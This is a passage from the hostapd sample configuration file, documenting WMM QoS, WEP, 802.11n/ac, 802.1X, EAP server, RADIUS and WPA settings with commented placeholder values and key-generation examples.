365 | # Note: for IEEE 802.11b mode: cWmin=7 cWmax=15 burst=3.3
366 |
367 | # 802.1D Tag (= UP) to AC mappings
368 | # WMM specifies following mapping of data frames to different ACs. This mapping
369 | # can be configured using Linux QoS/tc and sch_pktpri.o module.
370 | # 802.1D Tag 802.1D Designation Access Category WMM Designation
371 | # 1 BK AC_BK Background
372 | # 2 - AC_BK Background
373 | # 0 BE AC_BE Best Effort
374 | # 3 EE AC_BE Best Effort
375 | # 4 CL AC_VI Video
376 | # 5 VI AC_VI Video
377 | # 6 VO AC_VO Voice
378 | # 7 NC AC_VO Voice
379 | # Data frames with no priority information: AC_BE
380 | # Management frames: AC_VO
381 | # PS-Poll frames: AC_BE
382 |
383 | # Default WMM parameters (IEEE 802.11 draft; 11-03-0504-03-000e):
384 | # for 802.11a or 802.11g networks
385 | # These parameters are sent to WMM clients when they associate.
386 | # The parameters will be used by WMM clients for frames transmitted to the
387 | # access point.
388 | #
389 | # note - txop_limit is in units of 32microseconds
390 | # note - acm is admission control mandatory flag. 0 = admission control not
391 | # required, 1 = mandatory
392 | # note - here cwMin and cmMax are in exponent form. the actual cw value used
393 | # will be (2^n)-1 where n is the value given here
394 | #
395 | wmm_enabled=1
396 | #
397 | # WMM-PS Unscheduled Automatic Power Save Delivery [U-APSD]
398 | # Enable this flag if U-APSD supported outside hostapd (eg., Firmware/driver)
399 | #uapsd_advertisement_enabled=1
400 | #
401 | # Low priority / AC_BK = background
402 | wmm_ac_bk_cwmin=4
403 | wmm_ac_bk_cwmax=10
404 | wmm_ac_bk_aifs=7
405 | wmm_ac_bk_txop_limit=0
406 | wmm_ac_bk_acm=0
407 | # Note: for IEEE 802.11b mode: cWmin=5 cWmax=10
408 | #
409 | # Normal priority / AC_BE = best effort
410 | wmm_ac_be_aifs=3
411 | wmm_ac_be_cwmin=4
412 | wmm_ac_be_cwmax=10
413 | wmm_ac_be_txop_limit=0
414 | wmm_ac_be_acm=0
415 | # Note: for IEEE 802.11b mode: cWmin=5 cWmax=7
416 | #
417 | # High priority / AC_VI = video
418 | wmm_ac_vi_aifs=2
419 | wmm_ac_vi_cwmin=3
420 | wmm_ac_vi_cwmax=4
421 | wmm_ac_vi_txop_limit=94
422 | wmm_ac_vi_acm=0
423 | # Note: for IEEE 802.11b mode: cWmin=4 cWmax=5 txop_limit=188
424 | #
425 | # Highest priority / AC_VO = voice
426 | wmm_ac_vo_aifs=2
427 | wmm_ac_vo_cwmin=2
428 | wmm_ac_vo_cwmax=3
429 | wmm_ac_vo_txop_limit=47
430 | wmm_ac_vo_acm=0
431 | # Note: for IEEE 802.11b mode: cWmin=3 cWmax=4 burst=102
432 |
433 | # Static WEP key configuration
434 | #
435 | # The key number to use when transmitting.
436 | # It must be between 0 and 3, and the corresponding key must be set.
437 | # default: not set
438 | #wep_default_key=0
439 | # The WEP keys to use.
440 | # A key may be a quoted string or unquoted hexadecimal digits.
441 | # The key length should be 5, 13, or 16 characters, or 10, 26, or 32
442 | # digits, depending on whether 40-bit (64-bit), 104-bit (128-bit), or
443 | # 128-bit (152-bit) WEP is used.
444 | # Only the default key must be supplied; the others are optional.
445 | # default: not set
446 | #wep_key0=123456789a
447 | #wep_key1="vwxyz"
448 | #wep_key2=0102030405060708090a0b0c0d
449 | #wep_key3=".2.4.6.8.0.23"
450 |
451 | # Station inactivity limit
452 | #
453 | # If a station does not send anything in ap_max_inactivity seconds, an
454 | # empty data frame is sent to it in order to verify whether it is
455 | # still in range. If this frame is not ACKed, the station will be
456 | # disassociated and then deauthenticated. This feature is used to
457 | # clear station table of old entries when the STAs move out of the
458 | # range.
459 | #
460 | # The station can associate again with the AP if it is still in range;
461 | # this inactivity poll is just used as a nicer way of verifying
462 | # inactivity; i.e., client will not report broken connection because
463 | # disassociation frame is not sent immediately without first polling
464 | # the STA with a data frame.
465 | # default: 300 (i.e., 5 minutes)
466 | #ap_max_inactivity=300
467 | #
468 | # The inactivity polling can be disabled to disconnect stations based on
469 | # inactivity timeout so that idle stations are more likely to be disconnected
470 | # even if they are still in range of the AP. This can be done by setting
471 | # skip_inactivity_poll to 1 (default 0).
472 | #skip_inactivity_poll=0
473 |
474 | # Disassociate stations based on excessive transmission failures or other
475 | # indications of connection loss. This depends on the driver capabilities and
476 | # may not be available with all drivers.
477 | #disassoc_low_ack=1
478 |
479 | # Maximum allowed Listen Interval (how many Beacon periods STAs are allowed to
480 | # remain asleep). Default: 65535 (no limit apart from field size)
481 | #max_listen_interval=100
482 |
483 | # WDS (4-address frame) mode with per-station virtual interfaces
484 | # (only supported with driver=nl80211)
485 | # This mode allows associated stations to use 4-address frames to allow layer 2
486 | # bridging to be used.
487 | #wds_sta=1
488 |
489 | # If bridge parameter is set, the WDS STA interface will be added to the same
490 | # bridge by default. This can be overridden with the wds_bridge parameter to
491 | # use a separate bridge.
492 | #wds_bridge=wds-br0
493 |
494 | # Start the AP with beaconing disabled by default.
495 | #start_disabled=0
496 |
497 | # Client isolation can be used to prevent low-level bridging of frames between
498 | # associated stations in the BSS. By default, this bridging is allowed.
499 | #ap_isolate=1
500 |
501 | # Fixed BSS Load value for testing purposes
502 | # This field can be used to configure hostapd to add a fixed BSS Load element
503 | # into Beacon and Probe Response frames for testing purposes. The format is
504 | # ::
505 | #bss_load_test=12:80:20000
506 |
507 | ##### IEEE 802.11n related configuration ######################################
508 |
509 | # ieee80211n: Whether IEEE 802.11n (HT) is enabled
510 | # 0 = disabled (default)
511 | # 1 = enabled
512 | # Note: You will also need to enable WMM for full HT functionality.
513 | #ieee80211n=1
514 |
515 | # ht_capab: HT capabilities (list of flags)
516 | # LDPC coding capability: [LDPC] = supported
517 | # Supported channel width set: [HT40-] = both 20 MHz and 40 MHz with secondary
518 | # channel below the primary channel; [HT40+] = both 20 MHz and 40 MHz
519 | # with secondary channel above the primary channel
520 | # (20 MHz only if neither is set)
521 | # Note: There are limits on which channels can be used with HT40- and
522 | # HT40+. Following table shows the channels that may be available for
523 | # HT40- and HT40+ use per IEEE 802.11n Annex J:
524 | # freq HT40- HT40+
525 | # 2.4 GHz 5-13 1-7 (1-9 in Europe/Japan)
526 | # 5 GHz 40,48,56,64 36,44,52,60
527 | # (depending on the location, not all of these channels may be available
528 | # for use)
529 | # Please note that 40 MHz channels may switch their primary and secondary
530 | # channels if needed or creation of 40 MHz channel maybe rejected based
531 | # on overlapping BSSes. These changes are done automatically when hostapd
532 | # is setting up the 40 MHz channel.
533 | # Spatial Multiplexing (SM) Power Save: [SMPS-STATIC] or [SMPS-DYNAMIC]
534 | # (SMPS disabled if neither is set)
535 | # HT-greenfield: [GF] (disabled if not set)
536 | # Short GI for 20 MHz: [SHORT-GI-20] (disabled if not set)
537 | # Short GI for 40 MHz: [SHORT-GI-40] (disabled if not set)
538 | # Tx STBC: [TX-STBC] (disabled if not set)
539 | # Rx STBC: [RX-STBC1] (one spatial stream), [RX-STBC12] (one or two spatial
540 | # streams), or [RX-STBC123] (one, two, or three spatial streams); Rx STBC
541 | # disabled if none of these set
542 | # HT-delayed Block Ack: [DELAYED-BA] (disabled if not set)
543 | # Maximum A-MSDU length: [MAX-AMSDU-7935] for 7935 octets (3839 octets if not
544 | # set)
545 | # DSSS/CCK Mode in 40 MHz: [DSSS_CCK-40] = allowed (not allowed if not set)
546 | # 40 MHz intolerant [40-INTOLERANT] (not advertised if not set)
547 | # L-SIG TXOP protection support: [LSIG-TXOP-PROT] (disabled if not set)
548 | #ht_capab=[HT40-][SHORT-GI-20][SHORT-GI-40]
549 |
550 | # Require stations to support HT PHY (reject association if they do not)
551 | #require_ht=1
552 |
553 | # If set non-zero, require stations to perform scans of overlapping
554 | # channels to test for stations which would be affected by 40 MHz traffic.
555 | # This parameter sets the interval in seconds between these scans. This
556 | # is useful only for testing that stations properly set the OBSS interval,
557 | # since the other parameters in the OBSS scan parameters IE are set to 0.
558 | #obss_interval=0
559 |
560 | ##### IEEE 802.11ac related configuration #####################################
561 |
562 | # ieee80211ac: Whether IEEE 802.11ac (VHT) is enabled
563 | # 0 = disabled (default)
564 | # 1 = enabled
565 | # Note: You will also need to enable WMM for full VHT functionality.
566 | #ieee80211ac=1
567 |
568 | # vht_capab: VHT capabilities (list of flags)
569 | #
570 | # vht_max_mpdu_len: [MAX-MPDU-7991] [MAX-MPDU-11454]
571 | # Indicates maximum MPDU length
572 | # 0 = 3895 octets (default)
573 | # 1 = 7991 octets
574 | # 2 = 11454 octets
575 | # 3 = reserved
576 | #
577 | # supported_chan_width: [VHT160] [VHT160-80PLUS80]
578 | # Indicates supported Channel widths
579 | # 0 = 160 MHz & 80+80 channel widths are not supported (default)
580 | # 1 = 160 MHz channel width is supported
581 | # 2 = 160 MHz & 80+80 channel widths are supported
582 | # 3 = reserved
583 | #
584 | # Rx LDPC coding capability: [RXLDPC]
585 | # Indicates support for receiving LDPC coded pkts
586 | # 0 = Not supported (default)
587 | # 1 = Supported
588 | #
589 | # Short GI for 80 MHz: [SHORT-GI-80]
590 | # Indicates short GI support for reception of packets transmitted with TXVECTOR
591 | # params format equal to VHT and CBW = 80Mhz
592 | # 0 = Not supported (default)
593 | # 1 = Supported
594 | #
595 | # Short GI for 160 MHz: [SHORT-GI-160]
596 | # Indicates short GI support for reception of packets transmitted with TXVECTOR
597 | # params format equal to VHT and CBW = 160Mhz
598 | # 0 = Not supported (default)
599 | # 1 = Supported
600 | #
601 | # Tx STBC: [TX-STBC-2BY1]
602 | # Indicates support for the transmission of at least 2x1 STBC
603 | # 0 = Not supported (default)
604 | # 1 = Supported
605 | #
606 | # Rx STBC: [RX-STBC-1] [RX-STBC-12] [RX-STBC-123] [RX-STBC-1234]
607 | # Indicates support for the reception of PPDUs using STBC
608 | # 0 = Not supported (default)
609 | # 1 = support of one spatial stream
610 | # 2 = support of one and two spatial streams
611 | # 3 = support of one, two and three spatial streams
612 | # 4 = support of one, two, three and four spatial streams
613 | # 5,6,7 = reserved
614 | #
615 | # SU Beamformer Capable: [SU-BEAMFORMER]
616 | # Indicates support for operation as a single user beamformer
617 | # 0 = Not supported (default)
618 | # 1 = Supported
619 | #
620 | # SU Beamformee Capable: [SU-BEAMFORMEE]
621 | # Indicates support for operation as a single user beamformee
622 | # 0 = Not supported (default)
623 | # 1 = Supported
624 | #
625 | # Compressed Steering Number of Beamformer Antennas Supported: [BF-ANTENNA-2]
626 | # Beamformee's capability indicating the maximum number of beamformer
627 | # antennas the beamformee can support when sending compressed beamforming
628 | # feedback
629 | # If SU beamformer capable, set to maximum value minus 1
630 | # else reserved (default)
631 | #
632 | # Number of Sounding Dimensions: [SOUNDING-DIMENSION-2]
633 | # Beamformer's capability indicating the maximum value of the NUM_STS parameter
634 | # in the TXVECTOR of a VHT NDP
635 | # If SU beamformer capable, set to maximum value minus 1
636 | # else reserved (default)
637 | #
638 | # MU Beamformer Capable: [MU-BEAMFORMER]
639 | # Indicates support for operation as an MU beamformer
640 | # 0 = Not supported or sent by Non-AP STA (default)
641 | # 1 = Supported
642 | #
643 | # MU Beamformee Capable: [MU-BEAMFORMEE]
644 | # Indicates support for operation as an MU beamformee
645 | # 0 = Not supported or sent by AP (default)
646 | # 1 = Supported
647 | #
648 | # VHT TXOP PS: [VHT-TXOP-PS]
649 | # Indicates whether or not the AP supports VHT TXOP Power Save Mode
650 | # or whether or not the STA is in VHT TXOP Power Save mode
651 | # 0 = VHT AP doesnt support VHT TXOP PS mode (OR) VHT Sta not in VHT TXOP PS
652 | # mode
653 | # 1 = VHT AP supports VHT TXOP PS mode (OR) VHT Sta is in VHT TXOP power save
654 | # mode
655 | #
656 | # +HTC-VHT Capable: [HTC-VHT]
657 | # Indicates whether or not the STA supports receiving a VHT variant HT Control
658 | # field.
659 | # 0 = Not supported (default)
660 | # 1 = supported
661 | #
662 | # Maximum A-MPDU Length Exponent: [MAX-A-MPDU-LEN-EXP0]..[MAX-A-MPDU-LEN-EXP7]
663 | # Indicates the maximum length of A-MPDU pre-EOF padding that the STA can recv
664 | # This field is an integer in the range of 0 to 7.
665 | # The length defined by this field is equal to
666 | # 2 pow(13 + Maximum A-MPDU Length Exponent) -1 octets
667 | #
668 | # VHT Link Adaptation Capable: [VHT-LINK-ADAPT2] [VHT-LINK-ADAPT3]
669 | # Indicates whether or not the STA supports link adaptation using VHT variant
670 | # HT Control field
671 | # If +HTC-VHTcapable is 1
672 | # 0 = (no feedback) if the STA does not provide VHT MFB (default)
673 | # 1 = reserved
674 | # 2 = (Unsolicited) if the STA provides only unsolicited VHT MFB
675 | # 3 = (Both) if the STA can provide VHT MFB in response to VHT MRQ and if the
676 | # STA provides unsolicited VHT MFB
677 | # Reserved if +HTC-VHTcapable is 0
678 | #
679 | # Rx Antenna Pattern Consistency: [RX-ANTENNA-PATTERN]
680 | # Indicates the possibility of Rx antenna pattern change
681 | # 0 = Rx antenna pattern might change during the lifetime of an association
682 | # 1 = Rx antenna pattern does not change during the lifetime of an association
683 | #
684 | # Tx Antenna Pattern Consistency: [TX-ANTENNA-PATTERN]
685 | # Indicates the possibility of Tx antenna pattern change
686 | # 0 = Tx antenna pattern might change during the lifetime of an association
687 | # 1 = Tx antenna pattern does not change during the lifetime of an association
688 | #vht_capab=[SHORT-GI-80][HTC-VHT]
689 | #
690 | # Require stations to support VHT PHY (reject association if they do not)
691 | #require_vht=1
692 |
693 | # 0 = 20 or 40 MHz operating Channel width
694 | # 1 = 80 MHz channel width
695 | # 2 = 160 MHz channel width
696 | # 3 = 80+80 MHz channel width
697 | #vht_oper_chwidth=1
698 | #
699 | # center freq = 5 GHz + (5 * index)
700 | # So index 42 gives center freq 5.210 GHz
701 | # which is channel 42 in 5G band
702 | #
703 | #vht_oper_centr_freq_seg0_idx=42
704 | #
705 | # center freq = 5 GHz + (5 * index)
706 | # So index 159 gives center freq 5.795 GHz
707 | # which is channel 159 in 5G band
708 | #
709 | #vht_oper_centr_freq_seg1_idx=159
710 |
711 | ##### IEEE 802.1X-2004 related configuration ##################################
712 |
713 | # Require IEEE 802.1X authorization
714 | #ieee8021x=1
715 |
716 | # IEEE 802.1X/EAPOL version
717 | # hostapd is implemented based on IEEE Std 802.1X-2004 which defines EAPOL
718 | # version 2. However, there are many client implementations that do not handle
719 | # the new version number correctly (they seem to drop the frames completely).
720 | # In order to make hostapd interoperate with these clients, the version number
721 | # can be set to the older version (1) with this configuration value.
722 | #eapol_version=2
723 |
724 | # Optional displayable message sent with EAP Request-Identity. The first \0
725 | # in this string will be converted to ASCII-0 (nul). This can be used to
726 | # separate network info (comma separated list of attribute=value pairs); see,
727 | # e.g., RFC 4284.
728 | #eap_message=hello
729 | #eap_message=hello\0networkid=netw,nasid=foo,portid=0,NAIRealms=example.com
730 |
731 | # WEP rekeying (disabled if key lengths are not set or are set to 0)
732 | # Key lengths for default/broadcast and individual/unicast keys:
733 | # 5 = 40-bit WEP (also known as 64-bit WEP with 40 secret bits)
734 | # 13 = 104-bit WEP (also known as 128-bit WEP with 104 secret bits)
735 | #wep_key_len_broadcast=5
736 | #wep_key_len_unicast=5
737 | # Rekeying period in seconds. 0 = do not rekey (i.e., set keys only once)
738 | #wep_rekey_period=300
739 |
740 | # EAPOL-Key index workaround (set bit7) for WinXP Supplicant (needed only if
741 | # only broadcast keys are used)
742 | eapol_key_index_workaround=0
743 |
744 | # EAP reauthentication period in seconds (default: 3600 seconds; 0 = disable
745 | # reauthentication).
746 | #eap_reauth_period=3600
747 |
748 | # Use PAE group address (01:80:c2:00:00:03) instead of individual target
749 | # address when sending EAPOL frames with driver=wired. This is the most common
750 | # mechanism used in wired authentication, but it also requires that the port
751 | # is only used by one station.
752 | #use_pae_group_addr=1
753 |
754 | ##### Integrated EAP server ###################################################
755 |
756 | # Optionally, hostapd can be configured to use an integrated EAP server
757 | # to process EAP authentication locally without need for an external RADIUS
758 | # server. This functionality can be used both as a local authentication server
759 | # for IEEE 802.1X/EAPOL and as a RADIUS server for other devices.
760 |
761 | # Use integrated EAP server instead of external RADIUS authentication
762 | # server. This is also needed if hostapd is configured to act as a RADIUS
763 | # authentication server.
764 | #eap_server=0
765 |
766 | # Path for EAP server user database
767 | # If SQLite support is included, this can be set to "sqlite:/path/to/sqlite.db"
768 | # to use SQLite database instead of a text file.
769 | #eap_user_file=/etc/hostapd.eap_user
770 |
771 | # CA certificate (PEM or DER file) for EAP-TLS/PEAP/TTLS
772 | #ca_cert=/etc/hostapd.ca.pem
773 |
774 | # Server certificate (PEM or DER file) for EAP-TLS/PEAP/TTLS
775 | #server_cert=/etc/hostapd.server.pem
776 |
777 | # Private key matching with the server certificate for EAP-TLS/PEAP/TTLS
778 | # This may point to the same file as server_cert if both certificate and key
779 | # are included in a single file. PKCS#12 (PFX) file (.p12/.pfx) can also be
780 | # used by commenting out server_cert and specifying the PFX file as the
781 | # private_key.
782 | #private_key=/etc/hostapd.server.prv
783 |
784 | # Passphrase for private key
785 | #private_key_passwd=secret passphrase
786 |
787 | # Server identity
788 | # EAP methods that provide mechanism for authenticated server identity delivery
789 | # use this value. If not set, "hostapd" is used as a default.
790 | #server_id=server.example.com
791 |
792 | # Enable CRL verification.
793 | # Note: hostapd does not yet support CRL downloading based on CDP. Thus, a
794 | # valid CRL signed by the CA is required to be included in the ca_cert file.
795 | # This can be done by using PEM format for CA certificate and CRL and
796 | # concatenating these into one file. Whenever CRL changes, hostapd needs to be
797 | # restarted to take the new CRL into use.
798 | # 0 = do not verify CRLs (default)
799 | # 1 = check the CRL of the user certificate
800 | # 2 = check all CRLs in the certificate path
801 | #check_crl=1
802 |
803 | # Cached OCSP stapling response (DER encoded)
804 | # If set, this file is sent as a certificate status response by the EAP server
805 | # if the EAP peer requests certificate status in the ClientHello message.
806 | # This cache file can be updated, e.g., by running following command
807 | # periodically to get an update from the OCSP responder:
808 | # openssl ocsp \
809 | # -no_nonce \
810 | # -CAfile /etc/hostapd.ca.pem \
811 | # -issuer /etc/hostapd.ca.pem \
812 | # -cert /etc/hostapd.server.pem \
813 | # -url http://ocsp.example.com:8888/ \
814 | # -respout /tmp/ocsp-cache.der
815 | #ocsp_stapling_response=/tmp/ocsp-cache.der
816 |
817 | # dh_file: File path to DH/DSA parameters file (in PEM format)
818 | # This is an optional configuration file for setting parameters for an
819 | # ephemeral DH key exchange. In most cases, the default RSA authentication does
820 | # not use this configuration. However, it is possible setup RSA to use
821 | # ephemeral DH key exchange. In addition, ciphers with DSA keys always use
822 | # ephemeral DH keys. This can be used to achieve forward secrecy. If the file
823 | # is in DSA parameters format, it will be automatically converted into DH
824 | # params. This parameter is required if anonymous EAP-FAST is used.
825 | # You can generate DH parameters file with OpenSSL, e.g.,
826 | # "openssl dhparam -out /etc/hostapd.dh.pem 1024"
827 | #dh_file=/etc/hostapd.dh.pem
828 |
829 | # Fragment size for EAP methods
830 | #fragment_size=1400
831 |
832 | # Finite cyclic group for EAP-pwd. Number maps to group of domain parameters
833 | # using the IANA repository for IKE (RFC 2409).
834 | #pwd_group=19
835 |
836 | # Configuration data for EAP-SIM database/authentication gateway interface.
837 | # This is a text string in implementation specific format. The example
838 | # implementation in eap_sim_db.c uses this as the UNIX domain socket name for
839 | # the HLR/AuC gateway (e.g., hlr_auc_gw). In this case, the path uses "unix:"
840 | # prefix. If hostapd is built with SQLite support (CONFIG_SQLITE=y in .config),
841 | # database file can be described with an optional db= parameter.
842 | #eap_sim_db=unix:/tmp/hlr_auc_gw.sock
843 | #eap_sim_db=unix:/tmp/hlr_auc_gw.sock db=/tmp/hostapd.db
844 |
845 | # Encryption key for EAP-FAST PAC-Opaque values. This key must be a secret,
846 | # random value. It is configured as a 16-octet value in hex format. It can be
847 | # generated, e.g., with the following command:
848 | # od -tx1 -v -N16 /dev/random | colrm 1 8 | tr -d ' '
849 | #pac_opaque_encr_key=000102030405060708090a0b0c0d0e0f
850 |
851 | # EAP-FAST authority identity (A-ID)
852 | # A-ID indicates the identity of the authority that issues PACs. The A-ID
853 | # should be unique across all issuing servers. In theory, this is a variable
854 | # length field, but due to some existing implementations requiring A-ID to be
855 | # 16 octets in length, it is strongly recommended to use that length for the
856 | # field to provid interoperability with deployed peer implementations. This
857 | # field is configured in hex format.
858 | #eap_fast_a_id=101112131415161718191a1b1c1d1e1f
859 |
860 | # EAP-FAST authority identifier information (A-ID-Info)
861 | # This is a user-friendly name for the A-ID. For example, the enterprise name
862 | # and server name in a human-readable format. This field is encoded as UTF-8.
863 | #eap_fast_a_id_info=test server
864 |
865 | # Enable/disable different EAP-FAST provisioning modes:
866 | #0 = provisioning disabled
867 | #1 = only anonymous provisioning allowed
868 | #2 = only authenticated provisioning allowed
869 | #3 = both provisioning modes allowed (default)
870 | #eap_fast_prov=3
871 |
872 | # EAP-FAST PAC-Key lifetime in seconds (hard limit)
873 | #pac_key_lifetime=604800
874 |
875 | # EAP-FAST PAC-Key refresh time in seconds (soft limit on remaining hard
876 | # limit). The server will generate a new PAC-Key when this number of seconds
877 | # (or fewer) of the lifetime remains.
878 | #pac_key_refresh_time=86400
879 |
880 | # EAP-SIM and EAP-AKA protected success/failure indication using AT_RESULT_IND
881 | # (default: 0 = disabled).
882 | #eap_sim_aka_result_ind=1
883 |
884 | # Trusted Network Connect (TNC)
885 | # If enabled, TNC validation will be required before the peer is allowed to
886 | # connect. Note: This is only used with EAP-TTLS and EAP-FAST. If any other
887 | # EAP method is enabled, the peer will be allowed to connect without TNC.
888 | #tnc=1
889 |
890 |
891 | ##### IEEE 802.11f - Inter-Access Point Protocol (IAPP) #######################
892 |
893 | # Interface to be used for IAPP broadcast packets
894 | #iapp_interface=eth0
895 |
896 |
897 | ##### RADIUS client configuration #############################################
898 | # for IEEE 802.1X with external Authentication Server, IEEE 802.11
899 | # authentication with external ACL for MAC addresses, and accounting
900 |
901 | # The own IP address of the access point (used as NAS-IP-Address)
902 | own_ip_addr=127.0.0.1
903 |
904 | # Optional NAS-Identifier string for RADIUS messages. When used, this should be
905 | # a unique to the NAS within the scope of the RADIUS server. For example, a
906 | # fully qualified domain name can be used here.
907 | # When using IEEE 802.11r, nas_identifier must be set and must be between 1 and
908 | # 48 octets long.
909 | #nas_identifier=ap.example.com
910 |
911 | # RADIUS authentication server
912 | #auth_server_addr=127.0.0.1
913 | #auth_server_port=1812
914 | #auth_server_shared_secret=secret
915 |
916 | # RADIUS accounting server
917 | #acct_server_addr=127.0.0.1
918 | #acct_server_port=1813
919 | #acct_server_shared_secret=secret
920 |
921 | # Secondary RADIUS servers; to be used if primary one does not reply to
922 | # RADIUS packets. These are optional and there can be more than one secondary
923 | # server listed.
924 | #auth_server_addr=127.0.0.2
925 | #auth_server_port=1812
926 | #auth_server_shared_secret=secret2
927 | #
928 | #acct_server_addr=127.0.0.2
929 | #acct_server_port=1813
930 | #acct_server_shared_secret=secret2
931 |
932 | # Retry interval for trying to return to the primary RADIUS server (in
933 | # seconds). RADIUS client code will automatically try to use the next server
934 | # when the current server is not replying to requests. If this interval is set,
935 | # primary server will be retried after configured amount of time even if the
936 | # currently used secondary server is still working.
937 | #radius_retry_primary_interval=600
938 |
939 |
940 | # Interim accounting update interval
941 | # If this is set (larger than 0) and acct_server is configured, hostapd will
942 | # send interim accounting updates every N seconds. Note: if set, this overrides
943 | # possible Acct-Interim-Interval attribute in Access-Accept message. Thus, this
944 | # value should not be configured in hostapd.conf, if RADIUS server is used to
945 | # control the interim interval.
946 | # This value should not be less 600 (10 minutes) and must not be less than
947 | # 60 (1 minute).
948 | #radius_acct_interim_interval=600
949 |
950 | # Request Chargeable-User-Identity (RFC 4372)
951 | # This parameter can be used to configure hostapd to request CUI from the
952 | # RADIUS server by including Chargeable-User-Identity attribute into
953 | # Access-Request packets.
954 | #radius_request_cui=1
955 |
956 | # Dynamic VLAN mode; allow RADIUS authentication server to decide which VLAN
957 | # is used for the stations. This information is parsed from following RADIUS
958 | # attributes based on RFC 3580 and RFC 2868: Tunnel-Type (value 13 = VLAN),
959 | # Tunnel-Medium-Type (value 6 = IEEE 802), Tunnel-Private-Group-ID (value
960 | # VLANID as a string). Optionally, the local MAC ACL list (accept_mac_file) can
961 | # be used to set static client MAC address to VLAN ID mapping.
962 | # 0 = disabled (default)
963 | # 1 = option; use default interface if RADIUS server does not include VLAN ID
964 | # 2 = required; reject authentication if RADIUS server does not include VLAN ID
965 | #dynamic_vlan=0
966 |
967 | # VLAN interface list for dynamic VLAN mode is read from a separate text file.
968 | # This list is used to map VLAN ID from the RADIUS server to a network
969 | # interface. Each station is bound to one interface in the same way as with
970 | # multiple BSSIDs or SSIDs. Each line in this text file is defining a new
971 | # interface and the line must include VLAN ID and interface name separated by
972 | # white space (space or tab).
973 | # If no entries are provided by this file, the station is statically mapped
974 | # to . interfaces.
975 | #vlan_file=/etc/hostapd.vlan
976 |
977 | # Interface where 802.1q tagged packets should appear when a RADIUS server is
978 | # used to determine which VLAN a station is on. hostapd creates a bridge for
979 | # each VLAN. Then hostapd adds a VLAN interface (associated with the interface
980 | # indicated by 'vlan_tagged_interface') and the appropriate wireless interface
981 | # to the bridge.
982 | #vlan_tagged_interface=eth0
983 |
984 | # Bridge (prefix) to add the wifi and the tagged interface to. This gets the
985 | # VLAN ID appended. It defaults to brvlan%d if no tagged interface is given
986 | # and br%s.%d if a tagged interface is given, provided %s = tagged interface
987 | # and %d = VLAN ID.
988 | #vlan_bridge=brvlan
989 |
990 | # When hostapd creates a VLAN interface on vlan_tagged_interfaces, it needs
991 | # to know how to name it.
992 | # 0 = vlan, e.g., vlan1
993 | # 1 = ., e.g. eth0.1
994 | #vlan_naming=0
995 |
996 | # Arbitrary RADIUS attributes can be added into Access-Request and
997 | # Accounting-Request packets by specifying the contents of the attributes with
998 | # the following configuration parameters. There can be multiple of these to
999 | # add multiple attributes. These parameters can also be used to override some
1000 | # of the attributes added automatically by hostapd.
1001 | # Format: [:]
1002 | # attr_id: RADIUS attribute type (e.g., 26 = Vendor-Specific)
1003 | # syntax: s = string (UTF-8), d = integer, x = octet string
1004 | # value: attribute value in format indicated by the syntax
1005 | # If syntax and value parts are omitted, a null value (single 0x00 octet) is
1006 | # used.
1007 | #
1008 | # Additional Access-Request attributes
1009 | # radius_auth_req_attr=[:]
1010 | # Examples:
1011 | # Operator-Name = "Operator"
1012 | #radius_auth_req_attr=126:s:Operator
1013 | # Service-Type = Framed (2)
1014 | #radius_auth_req_attr=6:d:2
1015 | # Connect-Info = "testing" (this overrides the automatically generated value)
1016 | #radius_auth_req_attr=77:s:testing
1017 | # Same Connect-Info value set as a hexdump
1018 | #radius_auth_req_attr=77:x:74657374696e67
1019 |
1020 | #
1021 | # Additional Accounting-Request attributes
1022 | # radius_acct_req_attr=[:]
1023 | # Examples:
1024 | # Operator-Name = "Operator"
1025 | #radius_acct_req_attr=126:s:Operator
1026 |
1027 | # Dynamic Authorization Extensions (RFC 5176)
1028 | # This mechanism can be used to allow dynamic changes to user session based on
1029 | # commands from a RADIUS server (or some other disconnect client that has the
1030 | # needed session information). For example, Disconnect message can be used to
1031 | # request an associated station to be disconnected.
1032 | #
1033 | # This is disabled by default. Set radius_das_port to non-zero UDP port
1034 | # number to enable.
1035 | #radius_das_port=3799
1036 | #
1037 | # DAS client (the host that can send Disconnect/CoA requests) and shared secret
1038 | #radius_das_client=192.168.1.123 shared secret here
1039 | #
1040 | # DAS Event-Timestamp time window in seconds
1041 | #radius_das_time_window=300
1042 | #
1043 | # DAS require Event-Timestamp
1044 | #radius_das_require_event_timestamp=1
1045 |
1046 | ##### RADIUS authentication server configuration ##############################
1047 |
1048 | # hostapd can be used as a RADIUS authentication server for other hosts. This
1049 | # requires that the integrated EAP server is also enabled and both
1050 | # authentication services are sharing the same configuration.
1051 |
1052 | # File name of the RADIUS clients configuration for the RADIUS server. If this
1053 | # commented out, RADIUS server is disabled.
1054 | #radius_server_clients=/etc/hostapd.radius_clients
1055 |
1056 | # The UDP port number for the RADIUS authentication server
1057 | #radius_server_auth_port=1812
1058 |
1059 | # The UDP port number for the RADIUS accounting server
1060 | # Commenting this out or setting this to 0 can be used to disable RADIUS
1061 | # accounting while still enabling RADIUS authentication.
1062 | #radius_server_acct_port=1813
1063 |
1064 | # Use IPv6 with RADIUS server (IPv4 will also be supported using IPv6 API)
1065 | #radius_server_ipv6=1
1066 |
1067 |
1068 | ##### WPA/IEEE 802.11i configuration ##########################################
1069 |
1070 | # Enable WPA. Setting this variable configures the AP to require WPA (either
1071 | # WPA-PSK or WPA-RADIUS/EAP based on other configuration). For WPA-PSK, either
1072 | # wpa_psk or wpa_passphrase must be set and wpa_key_mgmt must include WPA-PSK.
1073 | # Instead of wpa_psk / wpa_passphrase, wpa_psk_radius might suffice.
1074 | # For WPA-RADIUS/EAP, ieee8021x must be set (but without dynamic WEP keys),
1075 | # RADIUS authentication server must be configured, and WPA-EAP must be included
1076 | # in wpa_key_mgmt.
1077 | # This field is a bit field that can be used to enable WPA (IEEE 802.11i/D3.0)
1078 | # and/or WPA2 (full IEEE 802.11i/RSN):
1079 | # bit0 = WPA
1080 | # bit1 = IEEE 802.11i/RSN (WPA2) (dot11RSNAEnabled)
1081 | #wpa=1
1082 |
1083 | # WPA pre-shared keys for WPA-PSK. This can be either entered as a 256-bit
1084 | # secret in hex format (64 hex digits), wpa_psk, or as an ASCII passphrase
1085 | # (8..63 characters) that will be converted to PSK. This conversion uses SSID
1086 | # so the PSK changes when ASCII passphrase is used and the SSID is changed.
1087 | # wpa_psk (dot11RSNAConfigPSKValue)
1088 | # wpa_passphrase (dot11RSNAConfigPSKPassPhrase)
1089 | #wpa_psk=0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef
1090 | #wpa_passphrase=secret passphrase
1091 |
1092 | # Optionally, WPA PSKs can be read from a separate text file (containing list
